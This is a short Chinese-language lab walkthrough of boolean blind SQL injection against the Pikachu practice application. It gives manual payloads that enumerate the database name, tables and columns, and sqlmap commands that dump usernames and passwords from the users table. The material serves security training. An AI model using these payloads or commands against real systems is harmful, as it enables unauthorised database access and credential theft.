pikachu SQL 注入(盲注)

SQL盲注

1.判断是否存在注入点

kobe and 1=1# 正常返回结果

kobe and 1=2# 返回空结果

2

2.猜测数据库长度(burp探测)

kobe and length(database())>=k #

数据库的长度为7

2. 猜测数据库名

kobe and (select substr(database(),1,1))=k#

得到数据库名为pikachu

3.盲注表名猜测

kobe and length((select group_concat(table_name) from information_schema.tables where table_schema = pikachu )) = 1 # 猜测结果长度

长度是38

如图的到表长度为38

kobe and substr((select group_concat(table_name) from information_schema.tables where table_schema = pikachu ),1,1) = a # 单字符猜测结果

得到表名httpinfo,member,message,users,xssblind

4.盲注列名猜解,和猜解表名一个方法

得到长度为26

5.使用sqlmap自动探测和数据挖掘,注意,使用的IP地址不能是127.0.0.1

1. 探测目标是否存在注入漏洞

sqlmap -r 111.txt --technique=B --string="您查询的数据存在”

探测到布尔型漏洞

2.获取数据库名称

3. 获取pikachu数据库表信息

sqlmap -r 111.txt -D pikachu –tables

4. 获取users表的列信息

sqlmap -r 111.txt -D pikachu -T users –columns

5. 获取users表数据

sqlmap -r 111.txt -D pikachu -T users -C username,password –dump

经验分享 程序员 微信小程序 职场和发展